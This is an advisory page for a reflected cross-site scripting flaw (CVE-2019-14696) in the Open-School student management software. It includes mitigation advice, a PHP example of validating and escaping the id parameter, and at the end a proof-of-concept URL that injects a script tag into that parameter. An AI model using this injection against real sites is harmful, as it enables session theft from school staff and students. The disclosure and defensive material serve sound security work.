Vendor: Open-School 3.0/Community Edition 2.3
By: Greg.Priest
CVSS: 6.1 (MEDIUM)
CWE: 79, Cross-Site Scripting (XSS)
Product Name: Open-School 3.0/Community Edition 2.3
Affected Version From: Open-School 3.0
Affected Version To: Community Edition 2.3
Patch Exists: YES
Related CVE: CVE-2019-14696
CPE: a:open-school:open-school_3.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows/Linux
2019

XSS in Open-School 3.0/Community Edition 2.3

Open-School 3.0 and Community Edition 2.3 allow XSS via the id parameter of /index.php?r=students/guardians/create. An attacker can inject malicious JavaScript code into the id parameter, and that code is executed when the page is loaded.

Mitigation:

Input validation should be used to prevent XSS attacks. Sanitize user input and escape output to prevent malicious code from being executed.
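
The two controls named above, applied to the id parameter, as an added example (not Open-School's code and not part of the original advisory). The function names and the hidden-field context in which the value is written out are assumptions; the page does not show where id is reflected.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers, not Open-School code: input validation and output
// escaping for the "id" query parameter of r=students/guardians/create.

/** Input validation: accept only an integer >= 1, otherwise return null. */
function parse_student_id(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Output escaping for an HTML text node or a quoted attribute value. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Vulnerable pattern (assumed sink): raw parameter concatenated into markup. */
function render_unsafe(string $rawId): string
{
    return '<input type="hidden" name="id" value="' . $rawId . '">';
}

/** Hardened pattern: reject non-integers, escape everything written out. */
function render_safe(?string $rawId): string
{
    $id = parse_student_id($rawId);
    if ($id === null) {
        // A real handler would also answer with HTTP 400 here.
        return '<p>Invalid student id: ' . h((string) $rawId) . '</p>';
    }
    // Write the parsed integer, never the original string.
    return '<input type="hidden" name="id" value="' . h((string) $id) . '">';
}

// Constructed sample inputs: a normal id and the value from the page's example request.
$samples = ['1', '1<script>alert("PWN3D!")</script>'];
foreach ($samples as $raw) {
    echo "raw:    {$raw}\n";
    echo "unsafe: " . render_unsafe($raw) . "\n";
    echo "safe:   " . render_safe($raw) . "\n\n";
}
```

Run from the command line with `php`; for the second sample the unsafe line contains a live script element, while the safe line shows the same characters entity-encoded inside an error message.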

Exploit-DB raw data:

# Exploit Title: [title]
# Date: [2019 08 06]
# Exploit Author: [Greg.Priest]
# Vendor Homepage: [https://open-school.org/]
# Software Link: []
# Version: [Open-School 3.0/Community Edition 2.3]
# Tested on: [Windows/Linux ]
# CVE : [CVE-2019-14696]


Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.

/index.php?r=students/guardians/create&id=1[inject JavaScript Code]

Example:
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>